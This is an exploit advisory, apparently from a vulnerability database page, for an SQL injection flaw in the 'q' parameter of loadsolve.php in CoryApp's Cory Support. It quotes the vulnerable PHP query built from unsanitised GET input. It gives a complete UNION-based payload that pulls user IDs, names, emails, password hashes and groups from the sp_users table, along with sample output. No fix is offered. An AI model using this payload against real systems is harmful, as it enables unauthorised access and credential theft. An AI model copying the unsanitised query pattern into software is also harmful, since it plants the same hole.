CoryApp Cory Support SQL Injection

2014.03.03
Credit: Slotleet
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: CoryApp (Cory Support) MySQL Injection Vulnerabilities # Google Dork: None # Date: 02,March 02,2014 # Exploit Author: Slotleet # Vendor Homepage: http://coryapp.com # Software Link: http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934 (u have to register) # Version: None # Tested on: Win,Linux # Greet'z : I-HMX <3 ========================== Vulnerability Description ========================== The Cory Support is prone to Get MySQL Injection Vulnerabilities ========================== PoC-Exploit ========================== // GET MySQL Injection with "q" Parameter in /loadsolve.php 1 : <?php 2 : require_once('includes/config.php'); 3 : require_once('includes/database.php'); 4 : $sql = "select Solutions, ProblemID from ".$table_prefix."problemsolutions where ProblemID = '".$_GET['q']."' limit 3"; 5 : $qry = mysql_query($sql); 6 : if(mysql_num_rows($qry)>0){ 7 : while($rows = mysql_fetch_array($qry)){ 8 : echo '<img src="'.$base_url.'imgs/re.gif" style="margin-left:3%"/>'.stripslashes($rows['Solutions']).'<br>'; 9 : } 10 : echo '<p style="margin:0px; padding:0px; margin-left:3%">. . .</p><a href="'.$base_url.'view.php?id='.$_GET['q'].'"><small><i>View more</i></small></a>'; 11 : } 12 : else echo '<i>Not have answer !</i>'; 13 : mysql_close(); 14 : ?> In line 3 coder failed to secure the "q" Parameter Against (MySQL Injection) using q parameter (1) Under "q" set your GET Parameter q to "999999.9' union all select (select concat(0x27%2C0x7e%2Cunhex(Hex(cast(sp_users.UserID as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Name as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Email as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.Password as char)))%2C0x5e%2Cunhex(Hex(cast(sp_users.UserGroup as char)))%2C0x27%2C0x7e) from `DATABASE NAME HERE`.sp_users limit 5%2C1) %2C0x31303235343830303536 and 'x'%3D'x" (without quotation marks) The "q" GET MySQL injection will be executed for the MySQL Server From browser (You'll see the info like '~6^admin^slotleet@gmail.com^e10adc3949ba59abbe56e057f20f883e^3'~) ========================== Solution ========================== Not Available. ========================== Credits ========================== Vulnerabilities found and advisory written by Slotleet.

References:

http://coryapp.com/download/?file=6108cd096d1c940dcff7c300ba966934


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top